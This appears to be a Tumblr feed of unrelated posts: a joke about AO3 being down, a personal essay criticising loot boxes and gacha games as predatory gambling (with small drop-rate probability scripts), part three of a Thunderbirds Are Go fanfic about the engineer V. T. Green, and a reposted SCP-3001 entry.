#actually though don’t try logging in or accessing the site cause it only creates more requests and hurts the website
ineedahugtm · 1 year
Dear diary,
It’s been approximately 2 hours since I’ve found out that ao3 has been down. I don’t think I can go on for very much longer. I keep typing the url into the address bar on safari before realizing that it’s still down and it’s only been 2 minutes since I last tried.
May god help us
lizzy-frizzle · 4 years
I’m going to start this by saying: I have bias. Everyone does. I do not intend for this to come off as “the thing you like is bad”, but more so “the corporation that controls the thing you like is manipulative”.
My background: I am a 26 year old trans mom, I have a history with addiction, particularly gambling, and I spend most of my time playing video games. I went to college for about 3 years for a psychology degree, and while I do not have my degree, I have been studying psychology for roughly 12 years. This is to say, my views will reflect this background. Just because I present this information the way I do does not inherently mean I’m right, though it also doesn’t mean I’m wrong. Try to view things with a critical mind, and know that most topics have nuance.
Ok, so lootboxes, booster packs, gacha games: all of these are gambling. This is not really an argument. You are putting money into a service of sorts and receiving a randomized result, be that a fancy new gun, that same boring legendary you have 5 of, or that final hero you’ve been trying to collect. You don’t know the outcome before you give your money. As defined by the Merriam-Webster dictionary: “gambling: the practice of risking money or other stakes in a game or bet.”
You are risking your money on the chance of not getting the item you want. There are ways this is handled acceptably, and ways this is handled poorly. Gambling is also illegal for people under 21 in a lot of places, but places online aren’t quick to tell you why. I don’t have any sources because every source requires a paywall to get any information, but pulling from my own personal experience and what I learned in college, it’s because children are very impressionable. I say “I like pokemon” and suddenly my 2-year-old can’t go anywhere without her pikachu. I remember distinctly playing poker with my mom and her friends when I was 12.

When you normalize gambling, what it does is lower your risk aversion toward gambling. You are less likely to see a threat in playing that card game, because when you are that young you have no concept of money. You don’t know what a dollar is, so why not throw it away to have fun? This is... I hesitate to call it fine, but it’s mostly harmless. The issue is with children and their lack of knowledge of money. Now that I’ve grown up and gotten a job, it’s a lot harder to tell my brain, “hey, don’t spend that money, you won’t get it back and you won’t get what you want,” because my brain just sees the potential for what I want. I want to buy the booster pack so I can have the potential to get that masterpiece Misty Rainforest. I want to buy that diamond pack so I have the chance to get the cute hero. I want to buy that lootbox so I can get the battle rifle that does a cool effect. These are harmless concepts, but very dangerous.
Make no mistake, companies know how psychology works, and will use it to their advantage. MatPat from Game Theory states that companies have even gone so far as to have systems in place that change the odds as you’re losing, and that monitor your skill level to put you up against harder opponents, so that you see their better weapons, go, “Oh, I want that!”, and are enticed to buy more lootboxes. As it turns out, I found an article covering what he was talking about: Activision had actually acquired a patent to arrange matchmaking to do just that [x]. The article says it’s not in place, but my trust in companies is not high enough to actually believe them. (Honestly, MatPat made a 2-part video series about lootboxes, and I’d recommend watching both.)
So, companies are trying to manipulate you into buying more gambling products. There’s proof of it. It’s also more blatantly obvious in games like Magic the Gathering, where they release fancier versions of cards at rarer probabilities. To better explain it: from a collector’s standpoint, you want the fancy card because it has value, and it has value because it’s rare, rarer than the other versions. So if you’re on the lower end of the income ladder you buy a pack, or two; after all, you could get lucky and get it. On the higher end of the income ladder, you buy the card outright and hoard it, maybe sell it off later if you notice the price going down. From a player perspective, you see a card being used by tournament players, you want to win more games, so you want those cards, which encourages you to buy products and try to get those cards. That’s predatory behavior. It’s predatory from the company’s perspective because that poor person might not be able to afford the card outright, but $5-$10 isn’t much, plus they always entice you with that Chance. They further this desire for the cards with limited runs, such as the Secret Lair packs: if only a small number are purchased and they’re made to order, or worse, if the company limits the order quantities itself, that drives up the value and provides further incentive to buy the cards and packs. This not only creates an impossible barrier between the poor and the rich, but also heavily encourages people to buy more of their gambling packs than they would have under other conditions.
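To put a rough number on that Chance, here is a tiny sketch using the geometric distribution: if a chase card shows up in a pack with probability p, you need 1/p packs on average to hit it. The drop rate and pack price below are made-up illustration values, not any real game’s published odds.

```python
# Expected-cost sketch for chasing one rare card in booster packs.
# All numbers are hypothetical, chosen only to illustrate the math.

def expected_packs(drop_rate: float) -> float:
    """Mean number of packs opened before hitting the card (geometric distribution)."""
    return 1.0 / drop_rate

def chance_within_budget(drop_rate: float, packs: int) -> float:
    """Probability of pulling the card at least once in `packs` packs."""
    return 1.0 - (1.0 - drop_rate) ** packs

drop_rate = 1 / 200   # hypothetical: the chase card is in 1 of every 200 packs
pack_price = 5.00     # hypothetical: $5 per pack

print(f"Expected packs: {expected_packs(drop_rate):.0f}")
print(f"Expected spend: ${expected_packs(drop_rate) * pack_price:.2f}")
print(f"Chance after 20 packs ($100): {chance_within_budget(drop_rate, 20):.1%}")
```

With these invented numbers, “only $5 a pack” works out to about 200 packs ($1,000) on average, while a $100 budget gives roughly a 9.5% chance of ever seeing the card. That gap between the per-pack price and the expected total is exactly the asymmetry described above.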
For the record, I love magic the gathering, I’m not saying the game itself is bad, this is just a VERY predatory marketing tactic.
Let’s switch gears. Gacha games. I play AFKArena, because like I said, I have a gambling addiction and cannot stop myself. In AFKArena, you collect heroes and battle with them in various ways. If you collect more of similar heroes you can rank them up. If I’m to believe what I’ve heard, this is pretty common for gacha games. So what makes it bad? In AFKArena you use diamonds to summon heroes. You can acquire diamonds by beating specific story chapters, logging in every day, random limited time events, or paying for them with real money. AFKArena’s hero drops don’t seem that bad compared to the free diamond amount they dish out, which has resulted in me not spending all that much money on it, all things considered ($20 over 2 years). I believe that for a mobile game like this, that’s fair. I get way more enjoyment out of the game than I do most $60 games, so it balances out. However, this isn’t the case for every gacha game, and my trust in companies, as previously stated, is very low. The issue lies in making the rates for good heroes so low that you HAVE to spend money on the game to really get over a roadblock of sorts. It’s possible that there is this issue in my game and I just didn’t notice it; someone with a lower tolerance or less patience might absolutely have the incentive to drop hundreds of dollars on the game over a month. There are people of all different flavours, and it’s important to keep that in mind when discussing these topics: just because a marketing technique doesn’t work on you does not mean it doesn’t work on anyone. After all, they have those $100 packs for a reason; you might not be that reason, but someone is. That’s predatory.
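The “it doesn’t work on you, but it works on someone” point can be made concrete with a small Monte Carlo sketch. Everything here is invented: a hypothetical 1% banner rate, a hypothetical pull cost, a hypothetical diamond price. The point is only the shape of the spending distribution, not any real game’s numbers.

```python
import random

# Hypothetical gacha: each pull costs 300 diamonds, the "good" hero drops 1%
# of the time, and diamonds run $1 per 100. None of these figures come from
# a real game; they exist only to show how spend is distributed.
PULL_COST_DIAMONDS = 300
DROP_RATE = 0.01
DOLLARS_PER_DIAMOND = 1 / 100

def dollars_to_first_hit(rng: random.Random) -> float:
    """Simulate pulling until the hero drops; return the total dollars spent."""
    pulls = 0
    while True:
        pulls += 1
        if rng.random() < DROP_RATE:
            return pulls * PULL_COST_DIAMONDS * DOLLARS_PER_DIAMOND

rng = random.Random(0)  # fixed seed so the sketch is reproducible
costs = sorted(dollars_to_first_hit(rng) for _ in range(10_000))
mean = sum(costs) / len(costs)
median = costs[len(costs) // 2]
p95 = costs[int(len(costs) * 0.95)]

print(f"mean ${mean:.0f}, median ${median:.0f}, 95th percentile ${p95:.0f}")
```

Even when the median player’s spend looks tame, the top few percent of unlucky (or less patient) players spend several times that before the hero ever drops. That tail of the distribution is who the $100 bundles exist for.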
I feel like I’ve gotten off track, let’s get back on the rails. Where was I... gambling... predatory… ah, kids. So my biggest issue is that Magic the Gathering is marketed towards 13 year olds. Not directly, but the packs say 13+. AFKArena, and any mobile game for that matter, can be downloaded by anyone with a phone for free, with minimal mention that there are microtransactions. AAA titles like Destiny 2, Overwatch, Fortnite, etc. are probably the worst offenders. A kid spent $16,000 of his parents’ money on Fortnite in-game purchases, and that’s not the only time this has happened [x] [x]. More often than not, what happens is: the kid wants to play a video game, like Halo on Xbox, or Destiny, or something; they ask their mom for her credit card, and the system saves it. I mentioned before that kids do not have a concept of money or its value, so giving kids unlimited access to the credit card is going to result in this kind of thing happening. I’m not blaming the parents for not being hypervigilant; sometimes you are really busy, or disabled, or whatever the reason, and you don’t notice the system just saved your card. I’m not blaming the kids, cause their brains are literally underdeveloped. I blame the corporations, because they make the process as easy as possible to prey on kids and people with gambling addictions. (As a personal anecdote, I found that if I want a magic card in MtG:O, I’m way less likely to try and buy it if I have to get up and get my card. I’d recommend not saving your card if you suffer from gambling/addiction problems.)
So after all of this evidence, how can anyone still view these things as anything but predatory? The answer is simple: you’re told they aren’t. Businesses spend hundreds of thousands of dollars on really good marketing and public relations. I tried to google why gambling is illegal for people under 21 and got nothing; I got a couple forums asking the question and a couple religious sites saying it’ll make them degenerates. I try looking up sources to prove the psychology behind these concepts, but they are locked behind paywall after paywall after paywall. Businesses and capitalism have made it so incredibly hard to discover the truth and get the information you need, and it’s on purpose. They want you to trust that that booster pack is a good idea. They want you to spend money on lootboxes (look at all the youtubers that shill for Raid: Shadow Legends and other gambling games to their super young fanbase [x]). They want you to lower your guard and go, “well, it’s a video game, how can it be predatory?” “it’s a card game with cute creatures on it, surely it’s not that bad”
But it is. So why did I make this post? I dunno, my brain really latched onto the topic. I see so many people enjoying gacha games, and I’m worried that it’s going to ruin lives... I just want everyone to be informed and critical of what is going on.
gumnut-logic · 5 years
V. T. Green (Part 3)
Title: V. T. Green
Part One | Part Two | Part Three
Author: Gumnut
1 - 5 Sep 2019
Fandom: Thunderbirds Are Go 2015/ Thunderbirds TOS
Rating: Teen
Summary: “Did you discover this, Brains?” He frowned. There was something familiar about this. Maybe they had discussed it recently.
“Oh, no, this is V. T. Green. The man is brilliant.”
Word count: 3174
Spoilers & warnings: None.
Timeline: Standalone
Author’s note: I has a lurgy. This is being typed as I cough my brain silly. Very annoying. Nutty hates being sick. Sick of being sick. I hope my writing does not suffer because of it (though last time I had a lurgy I wrote Prank War, so you never know what might happen :D )
This is one that I have been meaning to write for some time. I hope you enjoy it :D Many thanks to both @scribbles97 and @vegetacide for all their wonderful help with this.
Disclaimer: Mine? You’ve got to be kidding. Money? Don’t have any, don’t bother.
-o-o-o-
Scott eyed his brother as he slunk into the kitchen. A little pale, the man had finally made it out of his uniform into jeans with his usual red flannel draped over a bare chest. By the way he was moving, Scott could tell he hadn’t taken his painkillers.
A sigh. “I know you hate the pills, Virg, but you can’t tell me you prefer to be in pain.”
“I prefer to be able to think.”
“Pain hampers healing.”
“Yes, Mom.”
Scott’s lips thinned. “Pills or Grandma. Your choice.” Sometimes the big guns were necessary.
“Scott...”
“Hey, if our roles were reversed, what would you do?”
The glare wilted along with his brother’s shoulders. That prompted a grimace and tensed up Scott’s shoulders in turn. Goddamnit, Virg. He stood up from where he was seated at the breakfast bar and, striding across to his brother, gently steered the man to a seat at the table. “Sit down and stay put.”
That prompted another glare, but Scott ignored it, darting up the stairs and beyond into the residential levels and Virgil’s room. Sure enough, the bottle sat beside his bed, seal still intact. A grab and a jog back down to the kitchen...
...and Virgil had his head buried in the refrigerator.
He dumped the pills on the bench. “I thought I told you to sit.”
“I’m hungry.”
“Sit down and I will get you some dinner.”
“I can make my own dinner. I can at least do that.”
“Virgil-“
“I’m fine, Scott, just leave it.” A pair of frowning brown eyes glared at him over the fridge door.
Scott mirrored that frown. You want stubborn, just try me.
Virgil must have seen it in his expression, because the glare intensified.
“Sit down, Virgil.”
“Is that an order, Commander.”
“If necessary.”
The butter was yanked out of the refrigerator and thrown onto the counter with a loud clatter. The bread joined it and tumbled as it hit the laminate. A jar followed that would have fallen on the floor and smashed if Scott didn’t reach out and catch it. “What the hell? What’s wrong with you?”
“Just making myself some dinner.”
“Sit down!”
“I am fully capable of making myself dinner!”
“Sit down!”
“Scott-“
“Damn it, Virgil, if you don’t sit down, I will make you sit down.”
That arched an eyebrow. “You could try.”
“Either you sit down and stop being stupid, or I’ll get Grandma in here and you can discuss it with her.”
A plate hit the stone flags and smashed, clinking shards scattering across the floor.
Scott jumped. Virgil stared at him for a solid moment before crouching down and picking up pieces of crockery.
Scott didn’t miss the flinch of pain the movement caused.
For god’s sake. “Virgil-“
“Leave it, Scott, just leave it.”
There was something in his brother’s voice, something hurt.
“V-“
“For Christ’s sake, what do I have to say to you? Just leave me the hell alone!” Broken crockery was shoved into the kitchen bin. Virgil grabbed a broom and swept up the mess one-handed without saying another word. The butter, bread and jar of spread were thrown back into the refrigerator and without a glance back, his brother hit the stairs and left.
Scott stared after him.
The bottle of pills sat alone on the bench.
-o-o-o-
“J-John, have you heard of V. T. Green?”
The astronaut turned around at Brains’ voice, the expected hologram flickering into being. “Good evening, Brains.” A hand reached out and shifted two situations to Resolved. A flick of his wrist and another landed in Not Required. “Who is V. T. Green?”
The engineer sighed. “I thought that at least y-you would know him. The m-man is a b-brilliant engineer.”
“Sounds more like Virgil’s wheelhouse.” He flicked a finger at the tropical low growing in strength just north of Western Australia and flagged it for more regular monitoring.
“Virgil h-hasn’t heard of him either. Wh-Which I find strange. I h-have been following Green’s b-blog for s-some time and I b-believe his w-work could be very useful for International Rescue.”
Now that gave him pause. John couldn’t recall Brains ever saying such a thing about any other scientist...well, except Moffie and that was for a completely different reason. “That’s high praise coming from you.”
“He d-deserves it. Have a look at this polymer.”
A series of equations appeared at John’s elbow. A glance soon became a frown of concentration. “Am I reading this correctly? Self healing?”
“Y-Yes. It w-would be invaluable for the Thunderbirds.”
A pause. “So, you want to contact this guy? Have you spoken to Scott? Kayo?”
The engineer tilted his head to one side. “I h-have attempted to gather some inform-mation, b-but haven’t had much success. I w-was hoping you m-might have b-better luck?”
John turned and eyed his friend. “You want me to run a check on him?” In other words, hack his blog and find out as much as possible.
“So I can g-go to Scott with enough d-detail to reassure him.”
Now that was a point. Scott was notoriously paranoid when it came to IR’s security. As bad, if not worse than Kayo. Brains was right to build a solid case.
“I can do. How much information do you need?”
“W-Whatever you can find.”
“FAB.”
“Thank you, John.”
“Not a problem.”
His hologram blinked out.
-o-o-o-
Scott couldn’t help himself. He followed his brother up the stairs to his room. What the hell was wrong with Virgil? It was so unlike him to get so angry with so little provocation.
Debrief had been nasty. Alan was defiant and angry and hurt. Without Virgil there to balance the scales, things had gotten out of hand quickly, the whole meeting devolving into a shouting match. Even John had started yelling.
Alan had stormed off, Gordon chasing after him.
Scott had been so angry. Virgil’s life had been endangered and all for a battle of wills. Grandma’s hand on his arm and her soft voice had snapped him out of it.
Damn.
He hated it when his brothers were injured. It wasn’t major, Virgil’s injury would heal, but still, all because Alan did something stupid.
He stood outside his brother’s closed door for a full two minutes before he raised his hand to knock.
“Scott? We have a situation.” John’s voice was soft.
He let his arm drop.
He would have to speak to Virgil later.
Apparently.
-o-o-o-
It took him another three hours, part of which involved sending Scott out to pluck yet another climber off the side of a mountain, before John had a chance to focus on the task Brains had requested.
The site itself appeared simple. Admittedly, John was a little distracted at first by its content. Brains was correct; the author definitely was someone to be admired. Granted, John’s knowledge of engineering wasn’t as extensive as Brains’ or Virgil’s, but there were definitely some very elegant solutions presented on the site. A glance at the source code, a dig for the originating IP address, and John easily found the site’s host in Silicon Valley, California. He launched a data miner and pulled the site logs, searching for IPs that had accessed the site for publishing, in an attempt to locate the author.
That’s when he hit a snag. According to the logs, each post had been created and posted from a different address. Sure, this was possible with an IP cloak, but it shouldn’t be possible to avoid his hack of that cloak.
He tracked one address through China to Russia and back out again to Spain, of all places, before he lost it at an exchange in Portugal. Another fed through Indonesia, six different servers in Japan, only to jump to a commercial satellite and claim it came from the Moon. John followed six more addresses before he discovered the layered encryption and the redirection code hidden under it.
“Oh, he’s good. Very good.” The logs themselves had been encoded to redirect the very same kind of hack John was attempting.
It took him another half hour to break the code that kept trying to lead him off on a wild goose chase.
And another hour to trace the server path through half the planet and then some - it did actually go via the moon, using some ancient tech not destroyed by the meteor shower that took out Moonbase Alpha.
By the time he finally tracked down the origin of the posts, John was beyond impressed.
When he discovered the identity of V. T. Green, he understood why.
It was so obvious, he should have known.
-o-o-o-
Dear V.T. Green. I represent a good company...
Hey, V.T. I am totally loving your stuff. You should go into business...
Doctor Green. Our university is very interested in gaining your services...
Sir, I need your help...
That last one caught his attention initially, but it devolved into a blatant scam two paragraphs in. It left him depressed.
He let his tablet fall onto his desk and his head into his one working hand. He had no idea what to do about all the requests for his assistance. Six different universities plus three other thought centres had replied, all ever so complimentary of his intellect. One laugh was that the Denver School of Advanced Technology was one of them. The bonus was that the admirer was a lecturer who had hated his guts.
Part of him wanted to reply and rub his face in it.
The tablet pinged again and Virgil was tempted to chuck the whole thing in the trash.
Message from Dr HH.
Virgil stared at it for a good minute before he inevitably touched the screen to open it.
Dear Doctor Green.
Why did half of them think he was a doctor? He had never claimed to be.
I have written you before, but I do not trust the vagaries of the internet and I feel the need to make sure you receive my request.
Virgil sighed. He was going to have to say something soon. This was unfair to Brains.
The letter went on to reiterate Brains’ suggestions regarding the polymer and reinforce the impression that they would be able to save lives.
Save lives.
It was what he did. And yes, that polymer could do that, as part of the Thunderbirds, but also if he released the rights to the design. Space and underwater habitats sorely needed the tech.
Of course, he had yet to run tests. Nothing practical had been tried. It could all be big hype over a big failure.
Another sigh and he closed his eyes. He hadn’t eaten, but he wasn’t hungry any more. His shoulder and arm hated him and his pills were down in the kitchen. To reach them, he would have to navigate the house and hope he didn’t run into any family members. He just didn’t feel like...explaining himself.
Perhaps he could crawl back into bed and find sleep again.
He stood up...and the emergency alarm cut off everything.
His response was reflex and he was out the door before processing another thought. He hit the elevator before he remembered he was off rescues, the car carrying him down to the comms room and dumping him there.
Damn.
But to be honest he really couldn’t not find out what was going on. He had a need to know where his brothers might be sent, no matter how it grated that he couldn’t go with them.
So, with some reluctance, he slunk around the corner into the comms room, forcing a positive gait across to the lounge where he parked himself, spine straight.
Gordon eyed him from across the other side of the circle, an eyebrow arching. Scott rose from behind their father’s desk and jogged down the steps and sat next to Virgil.
Virgil blinked. A flash of blue, a frown and thinned lips greeted him.
Damn. That would have to be fixed sooner rather than later.
Alan was the last to arrive, darting in from the kitchen and sitting beside Gordon. His eyes tracked across Virgil, but didn’t acknowledge him.
Out the corner of his eye, he saw Grandma frown.
“What’s the situation, John?”
“This is a big one. Remember the Grand Sequoia Dam?”
“A little hard to forget.”
“They are reporting fractures in the dam wall and they are claiming it has to do with our hasty repairs last time.”
“What?” Virgil shot to his feet. “I checked and double checked the seal. I even went back and conducted stress testing. There is no way that dam wall could be failing because of our repairs. The nanocrete is stronger than the entire wall itself.”
John stared at him a moment before continuing. “Whatever the cause, they are claiming the wall is failing. An evac order has gone out to the town below, but they are concerned there will not be enough time. They’ve called us, and Virgil in particular, to assist.”
A frown and Virgil was pulling up scans and diagrams of the dam. Their assessment was correct. The wall was failing. A frown. It shouldn’t be. The volume of water currently pressing on it simply didn’t have the energy to create the situation. A flick of his hand and he spun the view. For this to happen there needed to be pressure from this angle with a much higher amplitude.
“Virgil is injured.” It was Grandma who broached the obvious.
“I’m going.”
That sprouted a whole array of glares.
He straightened where he stood. “I need to know what is causing this.”
“You can do that from here.” Of course, Scott would object.
“No, I prefer to be onsite.”
“You’re injured.”
“No kidding. I will ride in Two with Gordon.” He didn’t miss the sudden widening of Gordon’s eyes at that comment. “Nothing energetic.” Scott was still glaring. “There are some things that have to be seen in person.”
Scott’s lips thinned. He was pedantic about injured brothers, as was Virgil, but there was something about the situation, something odd, and it was Virgil’s reputation at stake here. Due to the use of the nanocrete, a proprietary substance unique to IR, he had signed off the safety on the dam, and it was safe.
But not now.
“I’m going.”
Brains, who had been quiet up to this point, rose slowly from where he sat. “I agree with Virgil.”
“Brains...” Grandma was admonishing.
“This shouldn’t b-be happening.” He pointed at the crack in the dam. “The structure is d-designed to w-withstand strain far b-beyond what it is currently under. The n-nanocrete cannot be responsible, yet they are accusing us. Why?”
Scott stared at Brains. “You think this is targeted?”
“It is possible.”
“The Hood?”
“Unknown, but I do think we n-need Virgil onsite for this. He has the civil knowledge n-needed.”
“Why can’t you go?” Alan piped up, still not paying any attention to Virgil.
Brains blinked and frowned at the young astronaut. “Y-you are aware that V-Virgil is the more qualified engineer in this instance?”
“What?”
It was Gordon who rounded on his little brother. “You been living under a rock, bro? Virg is the man when it comes to this stuff. You know that.”
Blue eyes frowned. “I just thought Brains could go since Virgil is injured.”
“I could, b-but Virgil’s knowledge is greater.”
Finally, Alan turned to him, but Virgil no longer had the time. “We need to get moving, that dam is not going to hold much longer.”
Scott shot to his feet. “Thunderbirds are go.”
-o-o-o-
It was odd going out on a rescue in Two, but not flying her. Virgil’s arm was still in a sling and strapped up, curled against his chest. Brains had made sure it was secure after helping him into his uniform. It hurt, but it was necessary.
The co-pilot’s seat had just a slightly different view.
Gordon launched her just as smoothly as Virgil would have. Alan sat quiet behind the both of them. As soon as they were airborne and stable, the young astronaut excused himself, muttering something about seeing to the pods.
The moment he was gone, Gordon didn’t waste any time poking the bear.
“What’s with you and Alan?”
“Nothing.” He really didn’t want to go into it.
The eyebrow arched at him was so similar to what Virgil would have done if their roles had been reversed, he almost smiled.
“Sounds like a pile of horse dung, but I’ll let you go with it.”
Virgil turned and stared at his brother.
Gordon didn’t react. “You know you scared the shit out of him, don’t you?”
“What?”
“He screwed up and his big brother got hurt.” Gordon flicked his gaze between the instruments and Virgil. “Scott reamed him out big time at debrief. You weren’t there and he really let rip.”
“Shit.” It came out under his breath.
“John lassoed him instead, but he didn’t respond as fast as you would have. Alan was kicking himself before that. By the time Scott had finished with him, he was on the verge of never going out on a rescue ever again.”
“He made a mistake. We all make mistakes.”
“He made a dick move, Virg. He didn’t listen to you or Scott and thought he knew better.” A snort. “I should know. Been there, done that, learnt the hard way.” A smirk. “First rule of International Rescue: If Virgil says it is, it is.” The smirk became a grin. “And woe be he who thinks otherwise.”
“Gordon...”
“I’m not kidding.” And the grin vanished, replaced by genuine honesty. “You know what you are talking about. You’re good at what you do.” A glance back at his flight path. “He should have listened to you.”
Virgil stared at his little brother. It took him a moment to gather himself. “Thank you, Gordon.”
The aquanaut shrugged. “Eh, I learnt the hard way, but I learnt. Anyway, you should probably talk to Alan.”
Virgil shifted in his seat and his shoulder complained loudly. He stared down at his feet. “Yeah, I should.”
There was silence in the cockpit for a bit. Virgil was caught up in what he should say to his littlest brother and Gordon quietly eyeing him.
The silence was obviously too much for Gordon. “So, who is this V. T. Green Brains keeps raving about?”
Virgil flinched, the question completely unexpected.
Gordon frowned at him. “What? What do you know about him?”
“Nothing.”
An amber blink. “Bullshit, Virg, you’re looking guilty as. What do you know? Scott said Brains was interested in inviting the guy to the island.”
Virgil’s head shot up and his shoulder screamed at him. Ow.
Gordon’s frown tried to cleave his face in half. “What the hell, Virgil? If you know something, why haven’t you said anything? Brains is going nuts trying to find this...guy.” And Gordon was staring at him in shock. “Oh my god.”
Virgil glared at him. “What?”
“It’s you.”
-o-o-o-
End Part Three
Part Four
let-them-eat-rakes · 5 years
RED REALITY (part 1)
(my longest post yet.)
Item #: SCP-3001
Object Class: Euclid
Special Containment Procedures: To prevent further accidental entries into SCP-3001, all Foundation reality-bending technology will be upgraded/modified with multiple newly developed safeguards to prevent Class-C "Broken Entry" Wormhole creation. While knowledge of SCP-3001 is available to personnel of any level should they wish to learn about it, research and experimentation with SCP-3001 and its associated technology is strictly limited to personnel of Level 3 and above, with special clearance designation granted from Sites 120, 121, 124, and 133.
Description: SCP-3001 is a hypothesized paradoxical parallel/pocket "non-dimension" accessible through the creation of a momentary Class-C "Broken Entry" Wormhole.(1) While believed to be an infinitely extending parallel universe, SCP-3001 is almost completely devoid of any matter and has an extremely low Hume Level of 0.032,(2) contradicting Kejel's Laws of Reality with the relation between Humes and spacetime. This phenomenon causes matter inside it to decay at an extremely low rate, and damage that would otherwise prove fatal does not impede any biological/electronic function; simulations suggest an organism can lose more than 70% of their body's tissue and still operate normally, as long as at least 40% of the brain remains. However, prolonged exposure will cause said matter to gradually approach SCP-3001's own Hume Level, resulting in severe tissue/structural damage as the matter's own Hume Field begins to disintegrate.
SCP-3001 was initially discovered on January 2, 2000, at Site-120, a facility dedicated to testing and containing reality-bending technology. Dr. Robert Scranton and his wife Dr. Anna Lang were Head Researchers at Site-120, and were developing an experimental device, called the "Lang-Scranton Stabilizer" (LSS).(3) Dr. Scranton was transported to SCP-3001 after unexpected seismic activity damaged several active LSS in Site-120 Reality Lab A.
Initially presumed dead, Dr. Scranton has survived in SCP-3001 for at least 5 years, 11 months, and 21 days. During this time, he was able to record his experiences and observations within SCP-3001 through a somehow still-functioning LSS control panel, which was also brought into SCP-3001 with him through the Class-C "Broken Entry" Wormhole. These recordings were later recovered upon the panel's sudden return, an unexpected side effect from testing improved reality-bending technology; these logs are the basis of SCP-3001 study. Despite new technologies being developed, retrieval and re-integration of Dr. Scranton has been unsuccessful. His current physical and mental states, if he is still alive, are unknown. [Further information on Dr. Scranton's possible retrieval is under Ethics Committee review.] Transcripts of Dr. Scranton's logs are below.
[No discernible/coherent dialogue can be heard from Dr. Scranton for the first eight days. He cycles through periods of panic, confusion, and anger throughout, and it seems he was attempting to navigate SCP-3001 to find a way out. He finally moved close enough to the recording log on the eleventh day, though did not notice it was operating for several more hours.]
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Favorite song, "Living on a Prayer."
Wife… Anna…
Anna…
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Favorite song, "Living on a Prayer."
Wife, Anna. She has green eyes. I love her very much.
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
Height, 178 cm.
Weight, 85 kg.
Wife, Anna. Anna, I'm sorry.
Name, Robert Scranton. Age, 39. Birthday, September 19, 1961.
Favorite color, blue.
My wife's name is Anna. We got married August 12, 1991.
I hope she got out okay.
Please let her be all right, please let her be all right.
Robert, Scranton. 39. Anna, blue, wife. Please… please, God, please…
Anna… Anna… Anna bo banna… Anna bo banna…
What the… what the hell is that? [It is assumed at this point Dr. Scranton noticed the flashing light of the recording module.]
What the fuck, this thing's actually recording?
[Metallic clang heard.]
[Voice is highly agitated and panicked.] My name, is Robert Scranton. Yeah, yeah, my name, is Robert Scranton, former researcher at Foundation Site-120. It has been… I don't know, actually, I… I can't remember. I… I estimate it's been ten days, but, I-I-I don't, I can't… Oh God, can anyone hear me?! I-I-I don't know what's happened, I-I don't know where I am, and-and, please, please is anyone there?! Hello?! Anyone?! ANYONE?!
No one can hear me. Oh God, oh God, oh God. Fuck, fuck, fuck, fuck, FUCK.
Why the hell is this thing even working, it can't be working, it SHOULDN'T be working, so what the hell?! I need to — God, I need to, I need to… see, how… long can I talk here, I think there's a-a-a cap or something on the recording log, and I-I-I can't see anything, I can only see the red light blinking on and off, I can't see any of the switches next to it…
I'm really hungry.
Thirsty, too. I think I should be dead from dehydration by now, but… I don't know.
Hi, little red light. Can you talk to me? Can you talk to… Anna, for me? Hello?
I found the controls.
Two weeks, three days, forty-seven hours, and fifty-eight minutes.
Two weeks, three days, forty-seven hours, and fifty-eight minutes.
Two weeks, three days, seven hours, and fifty-eight minutes.
Two weeks, three days, seven hours, and fifty-eight minutes.
Oh… Jesus.
ERROR WITH PLAYBACK, ERROR WITH PLAYBACK. ERROR WITH PLAYBACK.
Wherever the hell I am, I'm pretty sure now that… I don't need to eat to stay alive. It hurts… a lot, but… at this point I don't think I'm gonna die… So… I'm gonna… I'm gonna take my time… I guess. I… Maybe some sort of miracle will happen and I'll get out. Heh. Keep dreaming, Robert. Yeah, I'm… I'm tired, I'm gonna sleep.
Three weeks, four days, nineteen hours.
I have a picture of Anna in my pocket. I almost forgot. Little red light, let me see her face, please? Just a little bit, I just… I just want to see her a bit.
Hi, Anna, I'm still here, I'm still here. I'm coming back, okay?
Two months, four days, three hours.
… Hi. Robert here. Yeah, I-I haven't really recorded much to hear in the past few weeks. Ha. Hahahaha… Hahaha… huh… huh…
Sorry, gotta keep it together. Breathe.
I've been… I've been busy. Trying to learn more about the place I'm in. My prison. My kingdom all my own. Heh, King Robert. God, I stink. Is there even air in this goddamn place? Stinky King Robert, king of GODDAMN NOTHING FUCK.
…Sorry, sorry. I, I gotta keep this professional. I'll… I'll come back when I'm feeling rested.
… Okay, here goes. [Inhales then exhales deeply.]
My name is… Robert Scranton. I am a former Head Researcher of Site… 120, a Foundation facility dedicated to studying various reality-bending SCPs, for the purpose of developing more advanced countermeasures towards such threats.
For the last… red light, speak to me,
Two months, eight days, sixteen hours.
What red light said. I have been trapped in what I believe to be an empty pocket dimension. Alone. Yeah… alone. All alone.
I'm calling this place SCP… I don't know, I can't remember where we are, screw it. I don't know what's happened in the past… red light, please, again.
Two months, eight days, sixteen hours.
But… no one else is around to argue, and at this point… I'm just talking into this control panel to keep myself together. I… I need to keep a record. There might be some poor bastard in the future who ends up like me, and… if this ever actually makes it out… maybe, maybe I can help stop that from happening. That's all I have going for me right now, and I really need something to go for, hahahaha…
…So, yeah, Robert… Scranton… documenting a new SCP for… future research purposes. That'll have to do. Here we go!
- Close.
Two months, eleven days, ten hours.
Item number, SCP I don't fucking care.
Object Class, Euclid, I guess, but I don't know, I might update this in time. I need to explore more.
Special Containment Procedures, god I sound so much like a shrink right now… Um… I don't know if we could… contain wherever I am. It's… definitely not on Earth. To be honest I don't know where it is. I… I think it has to do something with the Stabilizer prototype… I'll explain that more later. Okay… um… yeah, wherever I am, I don't think it can be contained much as… created. No, no, that's not the word I'm looking for. Um… entered. Yeah, entered is better. I came into this place because of some really bad reality-bending accident and… no, no, Robert, don't be like that yet, you don't know if there's no exit yet. Ooooh… livin' on a prayer… halfway… there. Ahem.
Two months, eleven days, eighteen hours.
So… wait, no, Description, Robert, stick to the format… This place… It's some sort of reality gap, I think. It's dark. Really dark. As in, this little red light that shows my words are actually being recorded is the only visible light in this entire place. I can't see my hands, and I can barely see the control panel here. I've had to basically use the light as a center, and remember how many steps I take and in which direction. I haven't gone past a hundred yet. I'm too… I'm too scared to. Heh. I wonder if my hair is turning white, right now? I can't even see what color it is anymore. Speaking of which, my head has been a bit itchy recently. If I don't concentrate on it, it's fine, but I feel this… tingling all over my face. I'm not sure why.
Two months, fifteen days, four hours.
